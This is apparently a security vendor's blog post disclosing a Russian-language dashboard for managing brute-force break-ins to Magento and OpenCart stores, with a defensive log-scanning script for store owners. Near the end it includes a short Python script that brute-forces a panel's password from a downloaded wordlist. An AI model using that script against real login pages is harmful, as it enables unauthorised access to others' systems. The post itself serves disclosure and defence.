An OpenCart/Magento hacking dashboard

This post shows how sophisticated Magento hacking operations have become nowadays.

While investigating a bruteforced Magento store, I noticed that the hacker logged in using a curious referrer site:

"GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 ""

The site at shows:

[Screenshot: brute force dashboard]

A “Magento report panel” asks for a Пароль (password). In the page source (beautified JS here) are some clues about its password-protected functionality:

$.post("/home/getServers", function(n) {
$.post("/home/GetCountGoodLastDay", function(n) {
$.post("/home/GetCountServerLastDay", function(n) {
$.post("/home/GetCountSuccessLastDay", function(n) {
$.post("/home/ChangeMarkState", {
$.post("/home/ChangeComment", { 
$.post("/home/getCount", { 
$.post("/home/ChangeShell", {
$.post("/home/ChangeReservedLogins", {

Apparently somebody has built a sophisticated dashboard to manage bruteforce Magento hacking operations. It appears to show the daily progress on hacked Magento stores and it has a GUI method to mark found servers as “success”. Also, it can be used to log in to the backend of hacked stores.

I checked my forensic notes of previous cases and found that this dashboard was used in at least one other case. Sysadmins, check your server logs.
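As an added example (not code from the original post), here is the kind of log check that turns up the pattern above: it parses combined-format access log lines and flags requests to Magento admin or RSS paths whose Referer points at a host other than the store itself, which is how the dashboard-driven login showed up in the log. The store hostname, the IPs and the panel.example referrer are constructed values.

```python
import re
from urllib.parse import urlparse

# Apache/nginx "combined" log format: ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Paths that a backend login or the dashboard's "log in to the backend" step would touch.
WATCHED_PREFIXES = ("/admin", "/index.php/admin", "/rss/catalog/", "/rss/order/")


def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_referer(entry, own_hosts):
    """True if the request hits a watched path and its Referer comes from a foreign host."""
    if not entry or not entry["path"].startswith(WATCHED_PREFIXES):
        return False
    ref = entry["referer"]
    if ref in ("", "-"):
        return False  # no Referer at all: not the pattern seen in the post
    host = urlparse(ref).hostname or ""
    return host.lower() not in own_hosts


def find_dashboard_logins(lines, own_hosts):
    """Return (ip, path, referer) for each request that looks like a foreign-panel login."""
    own = {h.lower() for h in own_hosts}
    return [(e["ip"], e["path"], e["referer"])
            for e in map(parse_line, lines) if suspicious_referer(e, own)]


# Constructed sample lines; the IPs and "panel.example" are example/documentation values.
SAMPLE_LOG = [
    '198.51.100.2 - - [10/Apr/2016:08:00:01 +0000] "GET /index.php/admin/ HTTP/1.1" 200 4120 "https://shop.example/index.php/admin/" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Apr/2016:08:02:13 +0000] "GET /rss/catalog/notifystock/ HTTP/1.1" 200 5676 "http://panel.example/home/servers" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Apr/2016:08:02:15 +0000] "POST /index.php/admin/ HTTP/1.1" 302 0 "http://panel.example/home/servers" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Apr/2016:08:05:00 +0000] "GET /catalog/product/view/id/42 HTTP/1.1" 200 9000 "https://www.google.com/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_dashboard_logins(SAMPLE_LOG, {"shop.example"}):
        print("suspicious backend access:", hit)
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines and own_hosts with every hostname your store serves, so legitimate admin sessions (Referer on your own domain) are not flagged.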

Update April 11th: Super-sleuth Len Lorijn noted that an “Opencart Report Panel” is running on the same server. This signifies that e-commerce hackers are platform agnostic. If there’s money flowing through it, it’s worth hacking.

Returning the favour

What if the bruteforcer got bruteforced? Now, I won’t do that, as it is not allowed in my country. But in theory, you could use something like this (provided for educational purposes only):

#!/usr/bin/env python3
"""Brute force the admin password
of a Russian brute forcer's admin panel"""

import requests

URL = ''  # login endpoint of the panel (left blank in the original post)

print("Downloading Russian wordlist...")
wordlist = requests.get('').json()  # wordlist URL left blank in the original post

for word in wordlist:
    print("Trying {}".format(word))
    resp = requests.post(URL, data=dict(Password=word))
    # A failed attempt returns the login form again; a successful one does not.
    if resp.status_code == 200 and 'form action="/Account/Login"' not in resp.text:
        print("{} looks good!".format(word))

I am the creator of MageReport and have been tracking payment skimmers since 2015. My company Sanguine Security provides security solutions for online stores. If you need a solid cleanup & root cause analysis, do get in touch.